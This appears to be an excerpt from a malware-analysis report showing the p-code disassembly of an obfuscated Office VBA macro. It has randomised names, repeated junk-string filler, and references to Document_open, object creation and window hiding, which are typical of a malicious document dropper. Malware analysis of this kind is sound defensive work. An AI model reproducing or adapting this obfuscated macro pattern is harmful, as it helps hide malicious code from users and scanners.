' St Trim
' Line #63:
' LitStr 0x0015 " vcNMCvZAtj "
' ArgsLd HgKlHeRxyx$ 0x0001
' St eYCgTHbUrq
' Line #64:
' LitStr 0x0015 " GeEhhzvoze "
' ArgsLd HgKlHeRxyx$ 0x0001
' St AepzxwaawS
' Line #65:
' LitStr 0x0015 " wjOhwARgBL "
' ArgsLd HgKlHeRxyx$ 0x0001
' St hRoTwUiEiW
' Line #66:
' LitStr 0x000A "zSzItGhKYQ"
' St wqPQZAJhhx
' Line #67:
' LitDI4 0xB7F4 0x0001
' St EZTGslBbfq
' Line #68:
' Ld wqPQZAJhhx
' Ld EZTGslBbfq
' Coerce (Str)
' Concat
' St wqPQZAJhhx
' Line #69:
' Ld wqPQZAJhhx
' St sPkiPWgEFY
' Line #70:
' SetStmt
' Ld Lajnusjizy
' ArgsLd Rrxgcainj 0x0001
' Set Nqnuglkr
' Line #71:
' LitStr 0x0015 " fpCzbOrrBK "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Document_open
' Line #72:
' LitStr 0x0015 " kSTokTqrAE "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Trim
' Line #73:
' LitStr 0x0015 " vcNMCvZAtj "
' ArgsLd HgKlHeRxyx$ 0x0001
' St eYCgTHbUrq
' Line #74:
' LitStr 0x0015 " GeEhhzvoze "
' ArgsLd HgKlHeRxyx$ 0x0001
' St AepzxwaawS
' Line #75:
' LitStr 0x0015 " wjOhwARgBL "
' ArgsLd HgKlHeRxyx$ 0x0001
' St hRoTwUiEiW
' Line #76:
' LitStr 0x000A "zSzItGhKYQ"
' St wqPQZAJhhx
' Line #77:
' LitDI4 0xB7F4 0x0001
' St EZTGslBbfq
' Line #78:
' Ld wqPQZAJhhx
' Ld EZTGslBbfq
' Coerce (Str)
' Concat
' St wqPQZAJhhx
' Line #79:
' Ld wqPQZAJhhx
' St sPkiPWgEFY
' Line #80:
' LineCont 0x0004 03 00 00 00
' Ld Create
' Ld khknasas
' Add
' Ld Qfivltslbg
' Add
' Ld nbswe
' Ld Nqnuglkr
' Ld Edtiynlp
' ArgsMemCall (Call) Quhgaqiodzfj 0x0003
' Line #81:
' LitStr 0x0015 " fpCzbOrrBK "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Document_open
' Line #82:
' LitStr 0x0015 " kSTokTqrAE "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Trim
' Line #83:
' LitStr 0x0015 " vcNMCvZAtj "
' ArgsLd HgKlHeRxyx$ 0x0001
' St eYCgTHbUrq
' Line #84:
' LitStr 0x0015 " GeEhhzvoze "
' ArgsLd HgKlHeRxyx$ 0x0001
' St AepzxwaawS
' Line #85:
' LitStr 0x0015 " wjOhwARgBL "
' ArgsLd HgKlHeRxyx$ 0x0001
' St hRoTwUiEiW
' Line #86:
' LitStr 0x000A "zSzItGhKYQ"
' St wqPQZAJhhx
' Line #87:
' LitDI4 0xB7F4 0x0001
' St EZTGslBbfq
' Line #88:
' Ld wqPQZAJhhx
' Ld EZTGslBbfq
' Coerce (Str)
' Concat
' St wqPQZAJhhx
' Line #89:
' Ld wqPQZAJhhx
' St sPkiPWgEFY
' Line #90:
' EndFunc
' Line #91:
' FuncDefn (Function Rrxgcainj(Ewlgnelyjfrh))
' Line #92:
' LitStr 0x0015 " fpCzbOrrBK "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Document_open
' Line #93:
' LitStr 0x0015 " kSTokTqrAE "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Trim
' Line #94:
' LitStr 0x0015 " vcNMCvZAtj "
' ArgsLd HgKlHeRxyx$ 0x0001
' St eYCgTHbUrq
' Line #95:
' LitStr 0x0015 " GeEhhzvoze "
' ArgsLd HgKlHeRxyx$ 0x0001
' St AepzxwaawS
' Line #96:
' LitStr 0x0015 " wjOhwARgBL "
' ArgsLd HgKlHeRxyx$ 0x0001
' St hRoTwUiEiW
' Line #97:
' LitStr 0x000A "zSzItGhKYQ"
' St wqPQZAJhhx
' Line #98:
' LitDI4 0xB7F4 0x0001
' St EZTGslBbfq
' Line #99:
' Ld wqPQZAJhhx
' Ld EZTGslBbfq
' Coerce (Str)
' Concat
' St wqPQZAJhhx
' Line #100:
' Ld wqPQZAJhhx
' St sPkiPWgEFY
' Line #101:
' SetStmt
' Ld Ewlgnelyjfrh
' ArgsLd Jtfezogesgj 0x0001
' Set Rrxgcainj
' Line #102:
' LitStr 0x0015 " fpCzbOrrBK "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Document_open
' Line #103:
' LitStr 0x0015 " kSTokTqrAE "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Trim
' Line #104:
' LitStr 0x0015 " vcNMCvZAtj "
' ArgsLd HgKlHeRxyx$ 0x0001
' St eYCgTHbUrq
' Line #105:
' LitStr 0x0015 " GeEhhzvoze "
' ArgsLd HgKlHeRxyx$ 0x0001
' St AepzxwaawS
' Line #106:
' LitStr 0x0015 " wjOhwARgBL "
' ArgsLd HgKlHeRxyx$ 0x0001
' St hRoTwUiEiW
' Line #107:
' LitStr 0x000A "zSzItGhKYQ"
' St wqPQZAJhhx
' Line #108:
' LitDI4 0xB7F4 0x0001
' St EZTGslBbfq
' Line #109:
' Ld wqPQZAJhhx
' Ld EZTGslBbfq
' Coerce (Str)
' Concat
' St wqPQZAJhhx
' Line #110:
' Ld wqPQZAJhhx
' St sPkiPWgEFY
' Line #111:
' LineCont 0x0004 02 00 00 00
' Ld showwindow
' Ld Cyentyqxbctjp
' Add
' Ld Rrxgcainj
' MemSt Eivgcphxkfu
' Line #112:
' LitStr 0x0015 " fpCzbOrrBK "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Document_open
' Line #113:
' LitStr 0x0015 " kSTokTqrAE "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Trim
' Line #114:
' LitStr 0x0015 " vcNMCvZAtj "
' ArgsLd HgKlHeRxyx$ 0x0001
' St eYCgTHbUrq
' Line #115:
' LitStr 0x0015 " GeEhhzvoze "
' ArgsLd HgKlHeRxyx$ 0x0001
' St AepzxwaawS
' Line #116:
' LitStr 0x0015 " wjOhwARgBL "
' ArgsLd HgKlHeRxyx$ 0x0001
' St hRoTwUiEiW
' Line #117:
' LitStr 0x000A "zSzItGhKYQ"
' St wqPQZAJhhx
' Line #118:
' LitDI4 0xB7F4 0x0001
' St EZTGslBbfq
' Line #119:
' Ld wqPQZAJhhx
' Ld EZTGslBbfq
' Coerce (Str)
' Concat
' St wqPQZAJhhx
' Line #120:
' Ld wqPQZAJhhx
' St sPkiPWgEFY
' Line #121:
' EndFunc
' Line #122:
' FuncDefn (Function Gckkmlvwxbvq(Oxyugnittiwrf))
' Line #123:
' LitStr 0x0015 " fpCzbOrrBK "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Document_open
' Line #124:
' LitStr 0x0015 " kSTokTqrAE "
' ArgsLd HgKlHeRxyx$ 0x0001
' St Trim
' Line #125:
' LitStr 0x0015 " vcNMCvZAtj "
' ArgsLd HgKlHeRxyx$ 0x0001
' St eYCgTHbUrq
' Line #126:
' LitStr 0x0015 " GeEhhzvoze "
' ArgsLd HgKlHeRxyx$ 0x0001
' St AepzxwaawS
' Line #127:
' LitStr 0x0015 " wjOhwARgBL "
' ArgsLd HgKlHeRxyx$ 0x0001
' St hRoTwUiEiW
' Line #128:
' LitStr 0x000A "zSzItGhKYQ"
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.